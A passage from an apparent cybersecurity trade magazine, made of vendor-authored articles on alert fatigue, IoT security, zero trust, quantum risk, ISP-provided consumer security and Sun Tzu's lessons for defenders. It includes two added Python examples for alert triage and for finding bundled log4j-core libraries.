dashboard. Ideally, AI or ML capabilities will then automatically correlate those alerts with those from the
rest of your security stack.
Look for certified partners who have been tested for interoperability, and in the rare cases you need
something from outside of that ecosystem, be sure that the security tool offers open APIs. Before adopting
any new tools, it’s also a good idea to research what existing users have to say about “vendor lock” and
“lack of integration” before you commit to any new security vendors.
3. Embrace continuous security improvements
The core tenets of the agile software development movement apply equally well to security, especially
when it comes to reducing alert fatigue: prioritize individuals over tools, iterate quickly, receive and act
on real-world feedback quickly, and more.
One core tenet of agile is especially important for security: continuous improvement.
The security threat landscape and tools monitoring it will never stop evolving, so organizations will need
to adopt processes that enable them to adapt quickly to stay ahead of the threat curve.
4. Automate, automate, automate
Automation is another key principle for achieving agile security operations, and it’s one that Microsoft
stresses in its alert fatigue mitigation plan. For most large organizations, automation is necessary to even
begin to alleviate alert fatigue. In a tight labor market, there simply are not enough skilled security experts
available to tackle a problem of this scale unless manual, repetitive processes are automated. For alert
fatigue, automating things like basic alert correlation, checking alerts against watch lists, and
automatically ingesting patches and updates are all activities that should be automated to free up security
professionals to focus on other activities, such as threat hunting and remediation.
5. Include compliance as part of your automation efforts
In heavily regulated industries, many security alerts may directly tie back to your regulatory obligations,
but even if your business doesn’t need to comply with laws like PCI-DSS or HIPAA, new consumer
privacy laws, such as the GDPR in Europe and the CCPA in California, add obligations, and thus risks,
for a large swath of the economy.
As you seek to automate security tasks, be sure to investigate ways to tie compliance into the process,
which will streamline the overall process and reduce risks. For instance, Microsoft’s Purview Compliance
Manager helps organizations integrate compliance with security operations, ensuring that they keep up
with changing regulatory requirements and shifting risks.
6. Intelligently prioritize incident response
Not all alerts are created equal, and even actionable ones don’t all carry the same level of risk. Thus, it’s
important to prioritize the systems and applications that pose the biggest risks if breached or otherwise
damaged.
Prioritizing known attack vectors, actively watching for known high-risk behaviors like privileged access,
and maintaining an active watch list of known high-risk attackers will significantly cut down response
times by focusing your team on the most pressing, high-risk threats.
As you investigate how to reduce alert fatigue, be sure your security provider offers a Configuration
Management Database (CMDB) to provide real-time visibility into all of your networked assets. Ideally,
your CMDB should automatically track the changing state of those assets (patches, updates, etc.) and
correlate them with vulnerability scans and threat hunts.
7. Outsource alert management to a security provider that offers Managed Detection and Response (MDR) services
A common cause of alert fatigue can be traced back to limited resources. If your organization does not
have a large enough staff to manage SOC activities, you may have a hard time recruiting and retaining
staff in this tight labor market.
In late 2020, a Microsoft survey revealed that 82% of respondents planned to add security staff in the
coming year, while 81% also said that they needed to lower security costs. That’s a tough combination
to manage.
How does an organization add staff, while also lowering security costs?
The only way to do that today without increasing your organization’s attack surface is to outsource costly
security management burdens to service providers that are positioned to take advantage of economies
of scale.
Managed Detection and Response (MDR) service providers focus on one thing and one thing only:
security. They will have already optimized and automated much of the alert management process, and
MDR service providers will also have more resources to hunt threats, integrate alerts from third parties,
and detect zero-day threats before they cause problems.
However, when outsourcing MDR, it’s probably wise to find a security service provider that will also
provide complementary security services, such as managed SIEM and managed endpoint protection.
Prioritizing consolidation, certified partner solutions, and tested integrations will help you not only mitigate
alert fatigue, but also will help you embrace agile security as a core part of your organization’s ongoing
digital transformation efforts.
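As an added example that is not from the article or from Difenda, the following Python triage pass shows the kind of automation steps 4 and 6 describe: correlating the same event reported by several tools, checking indicators against a watch list, and weighting by asset criticality from a CMDB-style inventory. The alerts, watch list, asset inventory, vendor field names and scoring formula are all constructed for illustration.

```python
"""
Added example (not from the article or Difenda): a minimal alert triage pass
that correlates duplicate alerts from several tools, checks them against a
watch list of known-bad indicators, and prioritises by asset criticality.
All alerts, watch-list entries and assets below are constructed sample data.
"""
from datetime import datetime, timedelta

# Constructed sample alerts from three hypothetical tools (antivirus, IPS,
# firewall), each using its own field names and severity scale.
RAW_ALERTS = [
    {"vendor": "av", "time": "2022-06-01T10:00:05", "hostname": "ws-042", "ioc": "203.0.113.7", "sev": "medium"},
    {"vendor": "ips", "time": "2022-06-01T10:00:40", "src_host": "ws-042", "dst_ip": "203.0.113.7", "severity": 2},
    {"vendor": "fw", "time": "2022-06-01T10:01:10", "host": "ws-042", "remote": "203.0.113.7", "level": "low"},
    {"vendor": "ips", "time": "2022-06-01T10:30:00", "src_host": "db-01", "dst_ip": "198.51.100.9", "severity": 3},
    {"vendor": "fw", "time": "2022-06-01T11:00:00", "host": "ws-017", "remote": "192.0.2.44", "level": "low"},
]

# Constructed watch list of known-bad indicators (documentation-range IPs).
WATCH_LIST = {"203.0.113.7", "198.51.100.9"}

# Constructed CMDB-style inventory: asset criticality from 1 (low) to 5 (crown jewel).
CMDB = {"ws-042": 2, "ws-017": 1, "db-01": 5}

# Alerts on the same host/indicator pair inside this window are treated as one event.
CORRELATION_WINDOW = timedelta(minutes=5)

# Map each tool's severity labels onto one numeric scale.
SEVERITY_MAP = {"low": 1, "medium": 2, "high": 3, 1: 1, 2: 2, 3: 3}


def normalize(alert):
    """Map each vendor's field names onto a common schema."""
    if alert["vendor"] == "av":
        host, ioc, sev = alert["hostname"], alert["ioc"], alert["sev"]
    elif alert["vendor"] == "ips":
        host, ioc, sev = alert["src_host"], alert["dst_ip"], alert["severity"]
    else:  # firewall
        host, ioc, sev = alert["host"], alert["remote"], alert["level"]
    return {
        "vendor": alert["vendor"],
        "time": datetime.fromisoformat(alert["time"]),
        "host": host,
        "ioc": ioc,
        "severity": SEVERITY_MAP[sev],
    }


def correlate(alerts, window=CORRELATION_WINDOW):
    """Group alerts on the same (host, ioc) pair seen within `window` of the group's first alert."""
    groups = []
    for a in sorted((normalize(x) for x in alerts), key=lambda n: n["time"]):
        for g in groups:
            if g["host"] == a["host"] and g["ioc"] == a["ioc"] and a["time"] - g["first_seen"] <= window:
                g["vendors"].add(a["vendor"])
                g["severity"] = max(g["severity"], a["severity"])
                g["count"] += 1
                break
        else:  # no matching group: start a new one
            groups.append({"host": a["host"], "ioc": a["ioc"], "first_seen": a["time"],
                           "vendors": {a["vendor"]}, "severity": a["severity"], "count": 1})
    return groups


def score(group, watch_list=WATCH_LIST, cmdb=CMDB):
    """Constructed risk score: severity x asset criticality, doubled on a watch-list hit,
    plus one point for each additional independent tool that reported the same event."""
    s = group["severity"] * cmdb.get(group["host"], 3)  # unknown asset: assume medium criticality
    if group["ioc"] in watch_list:
        s *= 2
    s += len(group["vendors"]) - 1
    return s


def triage(alerts):
    """Return correlated groups ordered highest risk first, with the score attached."""
    groups = correlate(alerts)
    for g in groups:
        g["score"] = score(g)
        g["watch_list_hit"] = g["ioc"] in WATCH_LIST
    return sorted(groups, key=lambda g: g["score"], reverse=True)


if __name__ == "__main__":
    # Five raw alerts collapse to three events; the database host with a watch-list hit comes first.
    for g in triage(RAW_ALERTS):
        print(f"{g['score']:>3} {g['host']:<7} {g['ioc']:<14} vendors={sorted(g['vendors'])} "
              f"watchlist={g['watch_list_hit']} alerts={g['count']}")
```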
Learn more about how to maximize your existing investment in Microsoft Security or qualify for your
complimentary roadmap today!
About the Author
Derek Nugent is Vice President of Sales and Marketing for Difenda, a
SecOps-as-a-Service company. Before joining Difenda, Derek previously
served in leadership positions at Herjavec Group, Paladion, and CDW.
How to Protect All Five Stages of the IoT
Security Lifecycle
Smarter security for smart devices
By Mitchell Bezzina, Senior Director, Product Marketing, Cloud-delivered Security
Services, Palo Alto Networks
The dependency on IoT devices to enable business, capture data, and facilitate communication is
pervasive and continuing to evolve. While some of the most striking benefits of IoT revolve around
business process efficiency, productivity, and cost reduction, an increasing number of enterprises are
also recognizing IoT as an extraordinary source of intelligence with the ability to surface patterns or trends
within the information collected by these devices. Insights derived from IoT-generated data are proving
to be invaluable to business decision-makers.
This evolution is also introducing new security challenges for network and security teams alike.
Conventional network perimeter defenses and legacy processes are simply not equipped to address the
surge of new IoT security issues. The transformation opportunity for IoT-enabled business models in the
enterprise is massive. But to reap the benefits of transformation, enterprises need network security that
reliably enables IoT.
Today, IoT devices account for more than 30% of all network-connected enterprise endpoints.
Unique IoT Security Challenges
A growing number of IoT devices are virtually invisible in enterprise networks. From building and
streetlight sensors, flow monitors, surveillance cameras to IP phones, point-of-sale systems, conference
room technology, and so much more, IoT technology is on the network, in the organization, and
expanding rapidly.
These devices significantly expand an organization’s attack surface. Security teams are now faced with
new and escalating challenges which are unique to IoT security including visibility blind spots to inventory,
threats, risks and IoT data.
Take a Lifecycle Approach to IoT Security
Strategically minded CISOs and security leaders are moving beyond legacy solutions and taking a
complete IoT lifecycle approach, creating an IoT security posture that reliably enables IoT innovation and
protects the network from existing and unknown threats. The lifecycle approach encompasses five critical
stages of IoT security.
1. Understanding IoT Assets
The first stage in the IoT lifecycle requires gaining full visibility into the IoT attack surface, including
all known, unknown, and forgotten devices.
2. Assess IoT Risks
With the full visibility and context gained for both managed and unmanaged devices in stage one,
the risks these devices pose can be accurately assessed and monitored. Assessing risk in the
IoT security lifecycle requires real-time monitoring that continuously analyzes the behavior of all
the network connected IoT devices.
3. Automate risk-based security policy recommendations and enforcement
Taking into account that trust is in itself a vulnerability, an effective IoT security strategy must
directly align with the principle of Zero Trust to enforce policies for least-privileged access control
and network segmentation.
4. Prevent Known Threats
The diverse nature and use cases for IoT devices identified in the previous stages create a highly
distributed environment in the network with numerous points of compromise. Successful
outcomes of the security posturing in stage four of the IoT security lifecycle will require actionable
insights into the detection and prevention of known threats to the IoT devices for a swift response
to threat mitigation.
5. Detect & Respond to Unknown Threats
When it comes to detecting and preventing truly unknown threats, legacy strategies and
technology isolate threat data each organization receives and generates, creating silos and
reducing the possibility of prevention. To meet the requirements of the final stage of the IoT
security lifecycle, security teams need new capabilities and insights that draw from crowdsourced
threat intelligence. This last step will also uncover potential threats missed in earlier stages
thereby creating a cyclical process for continual improvement.
To learn more about IoT security best practices, read The Enterprise Buyer’s Guide to IoT Security, from
Palo Alto Networks.
About the Author
Mitchell Bezzina is the technology team leader with over 19 years of
experience in information security and endpoint forensics. Over the past
five years he has been focused on bringing new cybersecurity
technologies and services to market. In 2018 he drove the XDR market
revolution and industry creation while helping release Cortex XDR, the
first product in this space. Mitchell is currently focused on emerging
technologies like IoT Security and new innovations in Cloud-delivered
Security Subscriptions.
Mitchell Bezzina can be reached online at
mbezzina@paloaltonetworks.com and at our company website
https://www.paloaltonetworks.com/
More Than A “You’ve Been Breached” Mentality - Zero Trust, Quantum Computers, And the Future of Cyber
By Dr. Torsten Staab, Principal Engineering Fellow, Raytheon
The 2020 Internet Crime Report includes information from 791,790 complaints of suspected internet
crime, an increase of more than 300,000 complaints from 2019, and reported losses exceeding $4.2
billion. The most hacked industries include government, retail, and technology, due to the high level of
personal identifying information that they are known to hold - making a cyberattack very profitable.
In October 2021, the White House Office of Science and Technology Policy (OSTP) convened industry
stakeholders from across the country to discuss how quantum computers and quantum sensors will
benefit American society. While holding a lot of promise, quantum technology also poses unique risks to
enterprises, governments, and individuals around the world. With quantum computing-related cyber
security threats, assuming a breach has already occurred and using a zero trust-based approach will be
even more important.
Quantum technology and the potential of Zero Trust
Quantum Day or “Q-Day,” while 5-10 years out, is coming faster than we would like and it represents the
day that quantum computers will reliably use the superpositioning power of qubits (i.e., information bits
that can assume multiple states at once) to compute the codes needed to break asymmetric encryptions.
With that said, the arrival of Q-Day may rely on Zero Trust strategies as nations work to prepare for the
cyber risks that will inevitably accompany these computing advancements. We can no longer have this
‘castle-and-moat’ mindset, where we are hyper-focused on defending the perimeter, believing everybody
and everything already inside our network belongs there. We must assume that the bad guys are already
inside, accessing our data, and using “collect now, decrypt later” strategies.
Zero Trust teaches us important security concepts and ideas, such as:
“Never trust, always verify”
A "you've been breached" mentality
The replacement of traditional perimeter-based security
An introduction to micro-segmentation and multi-factor authentication
The incorporation of contextual analysis into the IT resource access decision-making process
Outlining a Plan of Action
In response to the challenges that Zero Trust holds, Raytheon Intelligence & Space (RI&S) offers the
expertise and flexible solutions to rapidly develop and implement a future-proof Zero Trust strategy that
will best fit an organization. For example, its highly scalable and extensible Zero Trust security platform
called REDPro ZTX (short for Raytheon Enterprise Data Protection with Zero Trust Extended) monitors
users, devices, networks, workloads, and data in real-time. It enables plug-and-play of multi-vendor Zero
Trust solutions; enforces least-privilege access; continuously verifies access requests; and facilitates
real-time, multi-level cyber response.
An effective and comprehensive Zero Trust solution must seamlessly provide multi-level Zero Trust
monitoring and policy enforcement at the edge, on premise, and in the cloud. RI&S’s REDPro ZTX
solution even goes a step further by combining cross-platform Zero Trust security with cyber resiliency.
Cyber resiliency adds important security features, such as independent hardware and software
attestation, self-healing, and deception.
REDPro ZTX allows customers to interchangeably plug-and-play defense-grade Zero Trust and cyber
resiliency technologies from RI&S and industry partners. Having modular building blocks allows
customers to decide which pillars of the Zero Trust model (users, devices, networks, workloads, and
data) they would like to focus on first and how to achieve comprehensive Zero Trust coverage over time.
RI&S’s modular and extensible REDPro ZTX platform was designed to speed up the deployment of Zero
Trust security across heterogenous IT (Information Technologies) and OT (Operational Technologies)
environments, while also lowering the technical risk, streamlining cyber security operations, and reducing
response times.
In addition to deploying Zero Trust security-based systems as soon as possible, organizations should
also consider developing a Quantum Security (QS) strategy and incorporating it into their ZT strategy. A
QS strategy, for example, could include the adoption and deployment of Post-Quantum Cryptography
(PQC), Quantum Random Number Generators (QRNG), and Quantum Key Distribution (QKD) systems.
Given the continuously evolving cyber threat landscape, including potential data security threats posed
by code-breaking quantum computers, the time to incorporate zero trust and quantum security into one’s
cyber strategy is now.
About the Author
Dr. Torsten Staab is a Raytheon principal engineering fellow. He
serves as Chief Innovation Officer for Raytheon Intelligence &
Space's Cyber, Intelligence, and Services business unit. In addition,
Staab also serves as Chief Technology Officer for Raytheon
Blackbird Technologies, Inc., a wholly owned subsidiary of
Raytheon Technologies.
Staab has an extensive background in software and systems
engineering. He is a recognized subject matter expert in areas such
as cybersecurity, data analytics, machine learning, distributed
systems and laboratory automation. He has contributed to more
than 50 publications, as well as five issued and five pending patents. He received a Diplom Informatiker
(FH) degree from the University of Applied Sciences in Wiesbaden, Germany. In addition, he also holds
master of science and doctorate degrees in Computer Science from the University of New Mexico.
Dr. Torsten Staab can be reached online on LinkedIn. See our company website at
https://www.raytheonintelligenceandspace.com/.
It’s time for Internet Providers to Become
Primary Security Providers
Consumers want cybersecurity protection, and they consider their CSPs as potential partners
By Barry Spielman, Director of Product Marketing, Allot
Most people are utterly unprepared for cyberattacks. Most people will be affected by cyberattacks.
Fortunately, most people have the potential to thwart many or most of the cyberattacks that target them.
The problem is that they don’t yet know about the defensive weapons that are starting to become
available from the very vehicle that brings cyberattacks to their devices. I am, of course, referring to
communication service providers, or CSPs. The telecom carriers and Internet providers who bring
connectivity to your home, office and right to your fingertips when you’re on the go are the perfect solution
providers for the ubiquitous cyber threats that are increasingly plaguing businesses and individuals
around the globe.
With the cost of cybercrime, according to one estimate, expected to rise to $10.5 trillion USD annually by
2025, compared with $6 trillion USD in 2021, there is no real way for crime fighters to outspend the cyber
criminals. But crime fighting is not the most effective way to combat cybercrime. It would be far more
effective to find a way to block the criminals before their attacks reach their targets. Now, you might say
that these methods have been around for years. But if they were effective, wouldn’t the cost of cybercrime
be dropping?
The truth is that cybersecurity solutions for regular people are missing an element that causes them to
be far less effective than they need to be. It’s not that they are lacking in technology standards or features.
There are many consumer cybersecurity solutions that are very good at what they do. The problem is
that people either don’t use them properly, or don’t use them at all. It’s hard to pinpoint why that is exactly.
But it probably lies somewhere between the fact that people are just busy with their lives and don’t get
around to cybersecurity tasks and the fact that there are so many options available that people don’t
know which ones are reliable.
When it comes to cybersecurity solutions for large enterprises, no expense is spared. There are teams
of professionals using an array of advanced tools to block, isolate, eliminate and prevent infections and
attacks. Meanwhile, as robust and effective as consumer tools for cybersecurity might be, the vast
majority of consumers lack the skills and even the basic knowledge to protect themselves properly, even
with a wide selection of available tools. What’s more, regular people need to be protected from infection
and attacks when they are connected to their mobile networks, in their home networks and when
connected to guest Wi-Fi networks. They need to protect all their devices, all of the time.
One particular vulnerability comes from IoT devices in people’s homes. The number of IoT devices
ranging from home appliances, to surveillance devices and home automation, is skyrocketing. Each
device acts as an open door for cybercriminals to invade people’s home network. With limited CPU and
memory, most IoT devices are designed with little or no capacity for security measures. Since passwords
are often left as the default, if there are passwords at all, IoT devices make easy entry points into the
network, giving cybercriminals access to personal data and other digital assets. These and other
vulnerabilities leave consumers wide open to attacks and infections.
That doesn’t mean that regular people are not interested in protecting themselves. In a recent survey by
Allot and Coleman Parkes Research, consumers expressed concern with virus infection (62%), loss of
privacy (59%), loss of sensitive data (59%), phishing attacks (51%) and other consequences of cyber
threats. In fact, they responded that they would, on average, be willing to pay $4.74 per month for a
comprehensive cybersecurity service provided by their CSP. However, in North America, 53% of
respondents said that they were not investing in securing their Internet-connected devices because they
did not know how to do it. In other words, consumers are concerned about cyber threats, and they are
willing to pay to be protected as long as it is easy.
In the same survey, 90% of respondents globally said that they believed that their internet provider should
also provide the security to protect them when they use the Internet. In fact, 68% said they would switch
providers to be on a more secure network. This raises the question: Where should consumers get their
cybersecurity protection?
Based on the responses of consumers, there is good reason to believe that communication service
providers can provide cybersecurity protection services that their customers will trust enough to subscribe
and use. This can be the case as long as the price is right and subscribers do not have to do much to
take advantage of these services. As it turns out, CSPs are perfectly positioned to provide cybersecurity
services that can meet all the requirements of their customers.
CSPs can integrate cybersecurity services into their network infrastructure and use the tools that they
already have for fast, widespread provisioning of services. When the solution sits in the network, as
opposed to the customer’s end device, it can block attacks before they reach and affect the device.
Network-based also means that the service can be ‘zero-touch’. In other words, people are protected
without having to do anything: No downloading, no installation, no configuration necessary. A CSP’s
customer can simply say yes and the service is activated. But if those aren’t good enough reasons for a
CSP to consider offering cybersecurity services, they might be encouraged by the potential of generating
recurring revenue from a service that has proven to be wildly popular with consumers when it is made
available to them by their CSP.
At Allot, we have seen upwards of 50% uptake on network-based cybersecurity services offered by CSPs.
With numbers like that, not only can a CSP differentiate their brand as a security provider, they can also
earn a significant amount of supplemental revenue with cybersecurity service offerings to consumer
mobile customers and home network customers. With solutions that offer 360-degree protection, a CSP
can offer a comprehensive service that protects customers wherever they are and on any device. That
could be an important step toward eliminating cyber threats in the consumer market.
About the Author
Barry Spielman is the Director of Security Product Marketing at Allot.
Prior to joining the Allot team Barry held marketing management
positions at networking and cybersecurity companies including Sixgill,
Verint and Gilat Satellite Networks. He holds a BA in Political Science
from Bar Ilan University, an MA in International Relations from George
Washington University and an MSM in Business Administration from
Boston University.
Barry can be reached online at (bspielman@allot.com) and at our
company website http://www.allot.com/
“Know your enemy,” and other cybersecurity lessons from Sun Tzu’s Art of War
The key on the cyber battlefield, like on the traditional military battlefield, is understanding that there
will indeed be many battles
By Shmulik Yehezkel (Colonel, res.), Chief Critical Cyber Operations Officer at CYE Security
As a cybersecurity professional and a reserve field officer in the Israeli military, I have found many
valuable insights on the pages of The Art of War, written by the fifth century Chinese military general Sun
Tzu. One particular but often overlooked passage titled “Attack by Stratagem” is particularly relevant
today as we face an infinite number of cyber threats and ever-growing lists of vulnerabilities. More than
ever, we need to prioritize, both what we need to protect in order to keep businesses and organizations
running and what attackers are likely to target, and this powerful passage that has been guiding warriors
for centuries holds important wisdom on how to do that, and why it is so important:
“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know
yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the
enemy nor yourself, you will succumb in every battle.”
Let’s fast forward 3,000 years and break this down in terms of cybersecurity, where we are indeed facing
hundreds of battles every day.
“Know your enemy”
In our line of work, it is crucial to define and locate potential threats. For example, I have worked in
organizations that did not take the time to understand the impending threat and instead spent their time
building an elaborate defense system to fend off only general and vague persistent threats. Conversely,
I have worked with some of the most sensitive of security teams that were so focused on one particular
threat that they did not dedicate enough resources towards building a comprehensive defense system.
Both examples did not take these simple three words into account.
The key to an effective defense strategy is defining who the threat actor is and what threats they are
making. In cyber terms, this means tracking the threat actors’ TTP, or tactics, threats and procedures, to
learn more about them. But that is not all; organizations must act on the intelligence they have, including
using it to help them hire appropriate cybersecurity professionals. For example, if organizations determine
they are facing threats from state-backed actors, they need to make sure they have cybersecurity
professionals on their team with experience in military or government IT or cyber divisions.
When you can understand the mindset of your enemy, you remain one step ahead in many ways.
“Know yourself”
Immediately following the awareness of the enemy, Sun Tzu tells us to know ourselves.
In our experience in the industry, we have seen organizations totally unaware of their assets or of which of
them required protection. For example, as thousands of organizations, from Apple to Belgium’s defense
ministry, continue to deal with the ongoing global Log4J vulnerability, millions more are likely not even
aware that they use this open-source library, and are thus exposed to what the top U.S. government
cyber security official has called one of the most serious vulnerabilities ever. In general, in more than 75%
of the cases in which we have handled an attack over the years, the victimized organization did not even
know the layout of its networks. In fact, attackers knew and understood the networks and assets better
than these organizations.
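An added example of the “know yourself” point above (not CYE’s tooling): a small inventory script that walks a filesystem and reports every Java archive that bundles log4j-core, including copies nested inside WAR files, together with the version the jar’s manifest declares. The sample directory tree, jar contents and version string are constructed inside the script so it runs offline:

```python
"""Added example: inventory which archives on a host bundle log4j-core,
as a 'know yourself' check. Detection keys on the package path of the
library's classes, and the version comes from the jar manifest. The
sample tree built by build_sample_tree() is constructed for the demo."""
import io
import os
import tempfile
import zipfile

LOG4J_CORE_PREFIX = "org/apache/logging/log4j/core/"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def _manifest_version(zf: zipfile.ZipFile) -> str:
    """Declared Implementation-Version from META-INF/MANIFEST.MF, or 'unknown'."""
    try:
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return "unknown"
    for line in text.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return "unknown"


def _scan_archive(zf: zipfile.ZipFile, label: str, hits: list) -> None:
    """Record log4j-core in this archive, then recurse into nested jars
    (for example WEB-INF/lib/*.jar inside a WAR) via in-memory buffers."""
    names = zf.namelist()
    if any(n.startswith(LOG4J_CORE_PREFIX) for n in names):
        hits.append((label, _manifest_version(zf)))
    for n in names:
        if n.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(n))) as inner:
                    _scan_archive(inner, f"{label}!{n}", hits)
            except zipfile.BadZipFile:
                continue  # an entry named like a jar need not be one


def find_log4j_core(root: str) -> list:
    """Walk root and return (archive_path, version) for every archive that
    bundles log4j-core; nested archives are labelled outer!inner."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(path) as zf:
                    _scan_archive(zf, path, hits)
            except zipfile.BadZipFile:
                continue
    return sorted(hits)


def build_sample_tree(root: str) -> None:
    """Constructed fixture: one bare log4j-core jar, one WAR embedding the
    same jar, and one unrelated jar. The version string is chosen for the demo."""
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\nImplementation-Version: 2.14.1\n")
        zf.writestr(LOG4J_CORE_PREFIX + "Logger.class", b"\xca\xfe\xba\xbe")
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(core.getvalue())
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
        war.writestr("index.html", "<html></html>")
    with zipfile.ZipFile(os.path.join(root, "lib", "other.jar"), "w") as zf:
        zf.writestr("com/example/Main.class", b"\xca\xfe\xba\xbe")


def run_demo() -> list:
    """Build the fixture in a temporary directory, scan it, and return
    (path relative to the fixture root, version) pairs."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return [(os.path.relpath(p, root), v) for p, v in find_log4j_core(root)]


if __name__ == "__main__":
    for path, version in run_demo():
        print(f"{path}: log4j-core {version}")
```

The check keys on the class package path rather than the file name, so a renamed or repackaged copy is still reported. Whether a reported version is affected by the vulnerability the article refers to is a separate decision; the inventory only answers the prior question of where the library is at all.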
In addition, organizations need to quantify risk, to understand what attacking each of their digital assets
ultimately means for the business. Depending on what they hit, cyberattacks have different effects on an
organization or business, from shutting down its website to obtaining proprietary information like customer
details or intellectual property to sell on the Dark Web, to disabling essential services like gas pipelines.
“If you know yourself but not the enemy, for every victory gained you will also suffer a defeat.”
Cybersecurity today is a combination of knowing yourself and the enemy. Even if a company has carried
out thorough security testing and prioritized all of its assets in relation to overall business risk from cyber
attacks, if it still doesn’t fully understand the most likely enemies or potential attackers, and respond
accordingly, it will not only still suffer defeat many times, but will be unprepared in case an attack does
happen.
Understanding the enemy and what they may want helps companies make appropriate and effective
contingency plans in case attacks happen. For example, if organizations know that attackers are likely to
ask for ransom, they can seek legal advice on the matter and understand the ramifications of paying,
which often does not actually lead to recovering all data. Or, if they know that attacks are likely to come
via the software supply chain, they can plan accordingly, including offering extra training on cyber hygiene
to their entire workforce. Today, responding to a cyber attack is no longer just about dealing with data
recovery, but it has far-reaching legal, financial and even physical consequences, like interrupted utility
services or frozen assembly lines.
“If you know neither the enemy nor yourself, you will succumb in every battle.”
After the above discussion, this last sentence is obvious in its meaning. But it also serves as a warning,
as many organizations remain woefully unprepared. Blindly investing in more and more technology and
tools or basing security on compliance with regulations is not enough.
The key on the cyber battlefield, like on the traditional military battlefield, is understanding, as Sun Tzu
writes, that there will indeed be many battles. And businesses must prepare for those battles by
understanding and quantifying their cyber risk continuously, and constantly monitoring who may attack
them and by what means.
Cyber incidents are widespread; businesses must be proactive, acting as a hunter and not as a fisherman
waiting for something to bite the line. They must execute “find evil” operations, maintain continuous
intelligence activity for threat discovery, and practice their Cyber Response Plan, because there will be
many battles.
About the Author
Colonel (res.) Shmulik Yehezkel, Chief Critical Operations
Officer at CYE, has over 26 years of experience in the
Israeli Defense Special Forces of the IDF. Shmulik is a
software engineer and a cybersecurity professional with
extensive strategic and hands-on experience. Shmulik
brings years worth of knowledge leading operations,
information security, and emergency and risk management
in the IDF, the Ministry of Defense, and the Office of the
Prime Minister of Israel. As CYE’s Chief Critical Operations
Officer, Shmulik leads the data forensics and incident
response (DFIR), threat hunting, and computer threats
intelligence (CTI) activities. His team consists of national-
level security experts and senior intelligence officers. The
team is tasked with bringing CYE’s ability to predict and
anticipate cyber threats and provide commercial
companies with the support and expertise they need to respond to cyber incidents.
Email: shmuel.yehezkel@cyesec.com website: www.cyesec.com
Why Zero Trust is Easier Said Than Done
By John Vecchi, CMO, Anitian
Zero trust security has made its way into the offerings of most enterprise security companies while
becoming a critical new architecture adopted by the Department of Defense (DoD) and the
federal government. However, many organizations today have built their information security programs
around more traditional security technologies and methodologies. Moving to and modernizing for
zero trust security is not as simple as adopting a single point technology or running a single scan. Here’s
why.
Comparing Zero Trust to Traditional Approaches
If we contrast a modern, zero trust approach to traditional, legacy security approaches, it’s
understandable why the National Security Agency (NSA), Department of Defense (DoD), Defense
Industrial Base (DIB), and the Biden Administration’s Executive Order on Cybersecurity are all mandating
Zero Trust Architectures (ZTA).
Yesterday’s legacy security strategy was built around a more traditional “internal trust” approach. The
idea is that once inside the trusted zone, applications and systems can freely communicate. Access to
the internal trusted zone is granted by passing users through a principal perimeter defense, in most
cases a next-generation firewall. This makes it easier for attackers: once they’ve stolen legitimate
credentials or found other methods to bypass the perimeter defense, they gain full access to the
trusted zone, where they can move laterally into the network. In these traditional security environments,
the network perimeter is the primary mechanism for enforcing access. Its focus on maximum
interoperability means that the default posture is to connect to everything, without asking what or why
users and systems really should be connecting to, or how we should be controlling access to minimize
risk and data breaches.
Zero trust security and architecture is designed to address these questions, building security on a default
foundation where no user or system should be allowed access to a resource until a certain level of trust
has been established. In a zero trust environment, every connection and all access are explicitly defined,
authorized, and constrained with each connection attempt. When a service (such as a system,
application, container, etc.) needs to connect with another service, that connection must use a valid
authentication method, pass some level of authorization, and be constrained and/or controlled to a strict
“need to know” basis for access. Hence, a default posture of “zero trust” until you prove to be trusted. But
even then, it’s only for that specific instance.
Zero Trust in the Real World
As an approach and architectural concept, zero trust is relatively simple. But as a practical, best practice
to architect and deploy, zero trust can be difficult. This is mostly because today’s existing, legacy security
environments are not designed, built, and deployed around zero trust principles.
Especially in today’s DevOps-driven cloud environments, development teams often build application and
service environments in “full trust” mode with little-to-no access restrictions or security controls. Only after
the application and cloud environment are built do security and DevOps teams work to implement security
controls and access restrictions on the production environment. In essence, the environment begins in a
vulnerable state. And, as the complexity of the cloud environment grows, the complexity of the security
controls and enforcement grows along with it. If certain controls or configurations are missed or
inaccurate, then the environment can be left vulnerable. According to Verizon’s 2022 Data Breach
Investigations Report, misconfiguration errors scored as the highest source of data breaches.
In contrast, if a zero trust architecture and approach were deployed and enforced by default, the
environment would be inherently secure, with no user or system having access. Not only would the
granting of access be a required and overt act, but the number of services needing access and the
scope of that access would also be finite and on a need-to-know basis. So, once you grant a system or user
the appropriate access, while automating the application of those rights, you’re done. And, since this
approach is deployed and enforced automatically and by default, the inherent security of the environment
grows more seamlessly and at the same rate as the environment itself (and its complexity).
Achieving Zero Trust through Automation
If a cloud infrastructure environment is pre-built, pre-configured, and standardized using automation,
with a cloud-native platform that deploys in a day (directly in your own AWS or Azure account) and is pre-
built to NIST 800-53 to enforce zero trust by design and by default, then a modern zero trust architecture
can be achievable and affordable for any size enterprise or organization. As such, developers can now
build their cloud applications within the confines of zero trust principles as soon as they begin, even as
early as day one. This means access rights become an integral component of the DevOps process and
a critical part of automated configuration management practices. As new applications are added to the
environment, developers work more seamlessly with security practitioners and DevSecOps teams to
configure access rights, authorization, logging, and other key infrastructure components.
Now, rather than having individual people tinkering with security tool configurations and access rights,
developers can code rights into automation scripts, then run those scripts against test environments,
evaluate their success, and perfect those scripts over time. Security practitioners and secure DevOps
